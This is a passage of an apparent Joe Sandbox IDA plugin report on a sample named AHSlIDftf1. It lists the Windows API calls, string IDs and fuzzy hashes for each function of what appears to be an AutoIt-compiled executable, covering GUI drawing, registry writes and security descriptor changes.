                                                                                                            • Instruction ID: 61322a032b60bd3b7a4c8fda2c36c03efd25e7e11613bc69e5a514694efe2944
                                                                                                            • Opcode Fuzzy Hash: 2d6dad6d7e387c27819515bcf27ada4f7107407fcf53ffa4147ebf9e16383621
                                                                                                            • Instruction Fuzzy Hash: 62026B71910208AFDB14DF68CC89EAE7BB9EF48311F148559F915AB2A1DB70AD06CB70
                                                                                                            APIs
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00DE712F
                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00DE7160
                                                                                                            • GetSysColor.USER32(0000000F), ref: 00DE716C
                                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 00DE7186
                                                                                                            • SelectObject.GDI32(?,?), ref: 00DE7195
                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00DE71C0
                                                                                                            • GetSysColor.USER32(00000010), ref: 00DE71C8
                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00DE71CF
                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 00DE71DE
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00DE71E5
                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00DE7230
                                                                                                            • FillRect.USER32(?,?,?), ref: 00DE7262
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00DE7284
                                                                                                              • Part of subcall function 00DE73E8: GetSysColor.USER32(00000012), ref: 00DE7421
                                                                                                              • Part of subcall function 00DE73E8: SetTextColor.GDI32(?,?), ref: 00DE7425
                                                                                                              • Part of subcall function 00DE73E8: GetSysColorBrush.USER32(0000000F), ref: 00DE743B
                                                                                                              • Part of subcall function 00DE73E8: GetSysColor.USER32(0000000F), ref: 00DE7446
                                                                                                              • Part of subcall function 00DE73E8: GetSysColor.USER32(00000011), ref: 00DE7463
                                                                                                              • Part of subcall function 00DE73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DE7471
                                                                                                              • Part of subcall function 00DE73E8: SelectObject.GDI32(?,00000000), ref: 00DE7482
                                                                                                              • Part of subcall function 00DE73E8: SetBkColor.GDI32(?,00000000), ref: 00DE748B
                                                                                                              • Part of subcall function 00DE73E8: SelectObject.GDI32(?,?), ref: 00DE7498
                                                                                                              • Part of subcall function 00DE73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00DE74B7
                                                                                                              • Part of subcall function 00DE73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DE74CE
                                                                                                              • Part of subcall function 00DE73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00DE74DB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                            • String ID:
                                                                                                            • API String ID: 4124339563-0
                                                                                                            • Opcode ID: e68e5eb446f8e5641d811e99a7e93eac85cf98750757eb2bd146d4f9328218b4
                                                                                                            • Instruction ID: c5b58b6279def78b4caef67ec754336fe2af336b6e98ca4959464b2dc539655a
                                                                                                            • Opcode Fuzzy Hash: e68e5eb446f8e5641d811e99a7e93eac85cf98750757eb2bd146d4f9328218b4
                                                                                                            • Instruction Fuzzy Hash: 93A1B472018341AFD741AF60DC88E5B7BA9FB49320F141A19FAA2DA2E1D731E945CB71
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,?), ref: 00D68E14
                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00DA6AC5
                                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00DA6AFE
                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00DA6F43
                                                                                                              • Part of subcall function 00D68F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D68BE8,?,00000000,?,?,?,?,00D68BBA,00000000,?), ref: 00D68FC5
                                                                                                            • SendMessageW.USER32(?,00001053), ref: 00DA6F7F
                                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00DA6F96
                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00DA6FAC
                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00DA6FB7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 2760611726-4108050209
                                                                                                            • Opcode ID: faec075dbfed445b00e736b1f74be739aa511a94a5b304ee90ea8ccb0975161b
                                                                                                            • Instruction ID: 3cee1a9c58d68463dd90eb2ff288a21155b8cd48171f4e44f2c968e41f6d5864
                                                                                                            • Opcode Fuzzy Hash: faec075dbfed445b00e736b1f74be739aa511a94a5b304ee90ea8ccb0975161b
                                                                                                            • Instruction Fuzzy Hash: A7129D30200241DFDB25DF24C884BA6BBE5FB5A311F1C8569F485DB262CB32E996DB71
                                                                                                            APIs
• DestroyWindow.USER32(00000000), ref: 00DD273E
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DD286A
• SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00DD28A9
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00DD28B9
• CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00DD2900
• GetClientRect.USER32(00000000,?), ref: 00DD290C
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00DD2955
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DD2964
• GetStockObject.GDI32(00000011), ref: 00DD2974
• SelectObject.GDI32(00000000,00000000), ref: 00DD2978
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00DD2988
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DD2991
• DeleteDC.GDI32(00000000), ref: 00DD299A
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DD29C6
• SendMessageW.USER32(00000030,00000000,00000001), ref: 00DD29DD
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00DD2A1D
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DD2A31
• SendMessageW.USER32(00000404,00000001,00000000), ref: 00DD2A42
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00DD2A77
• GetStockObject.GDI32(00000011), ref: 00DD2A82
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DD2A8D
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00DD2A97
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
• Opcode ID: 712f2a08110b87fedc3ab64730f9b96a10239f2cb09d468037443766349beea5
• Instruction ID: 13892bda2defc237e7e1a6c5255b557426d16d8863c25ceaa73b4fcc2f98fe7a
• Opcode Fuzzy Hash: 712f2a08110b87fedc3ab64730f9b96a10239f2cb09d468037443766349beea5
• Instruction Fuzzy Hash: F0B17C71A10315AFEB24DF68CC89FAE7BA9EB08711F004155F914EB2A0D770ED45CBA0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00DC4AED
• GetDriveTypeW.KERNEL32(?,00DECB68,?,\\.\,00DECC08), ref: 00DC4BCA
• SetErrorMode.KERNEL32(00000000,00DECB68,?,\\.\,00DECC08), ref: 00DC4D36
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: ef6317496c2fa49164c8e588e7b0b052200b5cc1dc19b0605c166378ec84f899
• Instruction ID: f8c1ed6f55b8b44ec54bd4bd0bfb86688c4e7edae1ab528f8d8319f55c943df5
• Opcode Fuzzy Hash: ef6317496c2fa49164c8e588e7b0b052200b5cc1dc19b0605c166378ec84f899
• Instruction Fuzzy Hash: 2761A030605207DBDB14EF28CAA2EA9B7B1EF44344B24541DFC46AB2A1DB31ED85DB71
APIs
• GetSysColor.USER32(00000012), ref: 00DE7421
• SetTextColor.GDI32(?,?), ref: 00DE7425
• GetSysColorBrush.USER32(0000000F), ref: 00DE743B
• GetSysColor.USER32(0000000F), ref: 00DE7446
• CreateSolidBrush.GDI32(?), ref: 00DE744B
• GetSysColor.USER32(00000011), ref: 00DE7463
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DE7471
• SelectObject.GDI32(?,00000000), ref: 00DE7482
• SetBkColor.GDI32(?,00000000), ref: 00DE748B
• SelectObject.GDI32(?,?), ref: 00DE7498
• InflateRect.USER32(?,000000FF,000000FF), ref: 00DE74B7
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DE74CE
• GetWindowLongW.USER32(00000000,000000F0), ref: 00DE74DB
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DE752A
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00DE7554
• InflateRect.USER32(?,000000FD,000000FD), ref: 00DE7572
• DrawFocusRect.USER32(?,?), ref: 00DE757D
• GetSysColor.USER32(00000011), ref: 00DE758E
• SetTextColor.GDI32(?,00000000), ref: 00DE7596
• DrawTextW.USER32(?,00DE70F5,000000FF,?,00000000), ref: 00DE75A8
• SelectObject.GDI32(?,?), ref: 00DE75BF
• DeleteObject.GDI32(?), ref: 00DE75CA
• SelectObject.GDI32(?,?), ref: 00DE75D0
• DeleteObject.GDI32(?), ref: 00DE75D5
• SetTextColor.GDI32(?,?), ref: 00DE75DB
• SetBkColor.GDI32(?,?), ref: 00DE75E5
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
• Opcode ID: 2af91cacdbe53c85f7b995f882c3b00764339871c42259c8738275c25e405bb9
• Instruction ID: 5e07a09daafb8d9fc3541932f2e89ddc7277444b713d4f67820a2d6a11febf69
• Opcode Fuzzy Hash: 2af91cacdbe53c85f7b995f882c3b00764339871c42259c8738275c25e405bb9
• Instruction Fuzzy Hash: DE616C72900358AFDF01AFA4DC89EAEBFB9EB08320F155115F915EB2A1D7709941DFA0
APIs
• GetCursorPos.USER32(?), ref: 00DE1128
• GetDesktopWindow.USER32 ref: 00DE113D
• GetWindowRect.USER32(00000000), ref: 00DE1144
• GetWindowLongW.USER32(?,000000F0), ref: 00DE1199
• DestroyWindow.USER32(?), ref: 00DE11B9
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00DE11ED
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DE120B
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DE121D
• SendMessageW.USER32(00000000,00000421,?,?), ref: 00DE1232
• SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00DE1245
• IsWindowVisible.USER32(00000000), ref: 00DE12A1
• SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00DE12BC
• SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00DE12D0
• GetWindowRect.USER32(00000000,?), ref: 00DE12E8
• MonitorFromPoint.USER32(?,?,00000002), ref: 00DE130E
• GetMonitorInfoW.USER32(00000000,?), ref: 00DE1328
• CopyRect.USER32(?,?), ref: 00DE133F
• SendMessageW.USER32(00000000,00000412,00000000), ref: 00DE13AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 89e124cf4b17560030bf92cef19304b24139dfe40470dfbd50cf73780ac4a1eb
• Instruction ID: 975eb0a8ef27ff3eb7ee3b019bb636f7b4aaaf0496d227da7930439ce085f6eb
• Opcode Fuzzy Hash: 89e124cf4b17560030bf92cef19304b24139dfe40470dfbd50cf73780ac4a1eb
• Instruction Fuzzy Hash: 98B18971604381AFDB14EF65C885B6ABBE4FF84350F04891CF9999B2A1D731E845CBA2
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D68968
• GetSystemMetrics.USER32(00000007), ref: 00D68970
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D6899B
• GetSystemMetrics.USER32(00000008), ref: 00D689A3
• GetSystemMetrics.USER32(00000004), ref: 00D689C8
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D689E5
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D689F5
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D68A28
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D68A3C
• GetClientRect.USER32(00000000,000000FF), ref: 00D68A5A
• GetStockObject.GDI32(00000011), ref: 00D68A76
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00D68A81
  • Part of subcall function 00D6912D: GetCursorPos.USER32(?), ref: 00D69141
  • Part of subcall function 00D6912D: ScreenToClient.USER32(00000000,?), ref: 00D6915E
  • Part of subcall function 00D6912D: GetAsyncKeyState.USER32(00000001), ref: 00D69183
  • Part of subcall function 00D6912D: GetAsyncKeyState.USER32(00000002), ref: 00D6919D
• SetTimer.USER32(00000000,00000000,00000028,00D690FC), ref: 00D68AA8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 4bef253f034a4c4b8acef6ea2f2dbd44c10ad89568c17d28a8f78cc185c9c690
• Instruction ID: 0d77b372f3a29a1545c38ef851804961c0362e6c847d5e93ca1ebdb4c2e37230
• Opcode Fuzzy Hash: 4bef253f034a4c4b8acef6ea2f2dbd44c10ad89568c17d28a8f78cc185c9c690
• Instruction Fuzzy Hash: 04B14971A00209DFDB14DFA8DC85BAA7BB5FB48314F184229FA15EB290DB74E941CF61
APIs
  • Part of subcall function 00DB10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DB1114
  • Part of subcall function 00DB10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1120
  • Part of subcall function 00DB10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB112F
  • Part of subcall function 00DB10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1136
  • Part of subcall function 00DB10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DB114D
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DB0DF5
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DB0E29
• GetLengthSid.ADVAPI32(?), ref: 00DB0E40
• GetAce.ADVAPI32(?,00000000,?), ref: 00DB0E7A
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DB0E96
• GetLengthSid.ADVAPI32(?), ref: 00DB0EAD
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DB0EB5
• HeapAlloc.KERNEL32(00000000), ref: 00DB0EBC
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DB0EDD
• CopySid.ADVAPI32(00000000), ref: 00DB0EE4
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DB0F13
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DB0F35
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DB0F47
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0F6E
• HeapFree.KERNEL32(00000000), ref: 00DB0F75
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0F7E
• HeapFree.KERNEL32(00000000), ref: 00DB0F85
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0F8E
• HeapFree.KERNEL32(00000000), ref: 00DB0F95
• GetProcessHeap.KERNEL32(00000000,?), ref: 00DB0FA1
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00DB0FA8
                                                                                                              • Part of subcall function 00DB1193: GetProcessHeap.KERNEL32(00000008,00DB0BB1,?,00000000,?,00DB0BB1,?), ref: 00DB11A1
                                                                                                              • Part of subcall function 00DB1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00DB0BB1,?), ref: 00DB11A8
                                                                                                              • Part of subcall function 00DB1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DB0BB1,?), ref: 00DB11B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 4175595110-0
                                                                                                            • Opcode ID: f0f107197e312bd5b257b7774384528c8d8d77879b9b51c7ce04d337fd20f209
                                                                                                            • Instruction ID: 400a8d99782d6bc8b305448e014f451f80147dc668c1e48ad5ab68e9a43a3795
                                                                                                            • Opcode Fuzzy Hash: f0f107197e312bd5b257b7774384528c8d8d77879b9b51c7ce04d337fd20f209
                                                                                                            • Instruction Fuzzy Hash: 03713C71A0430AEBDB209FA4DC45BEFBBB8BF09350F184155F91AE6251D7719905CB70
                                                                                                            APIs
                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DDC4BD
                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00DECC08,00000000,?,00000000,?,?), ref: 00DDC544
                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00DDC5A4
                                                                                                            • _wcslen.LIBCMT ref: 00DDC5F4
                                                                                                            • _wcslen.LIBCMT ref: 00DDC66F
                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00DDC6B2
                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00DDC7C1
                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00DDC84D
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00DDC881
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00DDC88E
                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00DDC960
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                            • API String ID: 9721498-966354055
                                                                                                            • Opcode ID: 2fa0cea81e55cdde71ae10633ad9ea1f3331e6ed7c2f860c0aa045861e1edba7
                                                                                                            • Instruction ID: 859e216c1dc3ee4c9e516cead424e6f3e834ee7006bf65ee7169d4f19077a3eb
                                                                                                            • Opcode Fuzzy Hash: 2fa0cea81e55cdde71ae10633ad9ea1f3331e6ed7c2f860c0aa045861e1edba7
                                                                                                            • Instruction Fuzzy Hash: 481268356142019FDB14DF14C891E2AB7E5EF88725F18885DF88A9B3A2DB31FC45CBA1
                                                                                                            APIs
                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00DE09C6
                                                                                                            • _wcslen.LIBCMT ref: 00DE0A01
                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DE0A54
                                                                                                            • _wcslen.LIBCMT ref: 00DE0A8A
                                                                                                            • _wcslen.LIBCMT ref: 00DE0B06
                                                                                                            • _wcslen.LIBCMT ref: 00DE0B81
                                                                                                              • Part of subcall function 00D6F9F2: _wcslen.LIBCMT ref: 00D6F9FD
                                                                                                              • Part of subcall function 00DB2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DB2BFA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                            • API String ID: 1103490817-4258414348
                                                                                                            • Opcode ID: d5662bda753f13d697b48a2c4cd1d4a911d9fb49c1f517814fbf21e096387304
                                                                                                            • Instruction ID: a940261031210e2802a837dd760f0c63977fa025990ed5da48b57e706ca30381
                                                                                                            • Opcode Fuzzy Hash: d5662bda753f13d697b48a2c4cd1d4a911d9fb49c1f517814fbf21e096387304
                                                                                                            • Instruction Fuzzy Hash: 58E1AE312087818FCB14EF25C45196ABBE1FF98314B18895DF896AB362D770ED85CBB1
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
